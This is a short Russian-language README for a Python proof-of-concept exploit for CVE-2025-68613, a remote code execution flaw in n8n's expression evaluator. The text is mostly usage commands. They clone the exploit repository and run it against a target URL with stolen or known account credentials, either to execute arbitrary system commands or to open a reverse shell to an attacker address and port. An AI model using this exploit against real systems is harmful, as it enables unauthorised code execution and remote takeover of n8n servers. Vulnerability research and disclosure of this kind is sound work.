
Python Exploit for CVE-2025-68613.
Эксплойт Proof of Concept (PoC) для критической уязвимости удаленного выполнения кода в платформе автоматизации рабочих процессов n8n.
Уязвимость существует в системе оценки выражений n8n. Выражения, предоставляемые пользователем, недостаточно изолированы (sandbox), что позволяет аутентифицированным злоумышленникам выполнять произвольный код на хост-системе.
Идентификатор CVE: CVE-2025-68613
Тип уязвимости: Удаленное выполнение кода (RCE)
Компонент: Оценщик выражений
git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txt
python3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]
-t, --target : Целевой URL (например, http://localhost:5678)-u, --username : Адрес электронной почты учетной записи n8n-p, --password : Пароль учетной записи n8n-c, --cmd : Системная команда для выполнения--reverse-shell : Запустить обратную оболочку (Формат: IP ПОРТ)python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" -c "id"
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" --reverse-shell 192.168.1.100 4444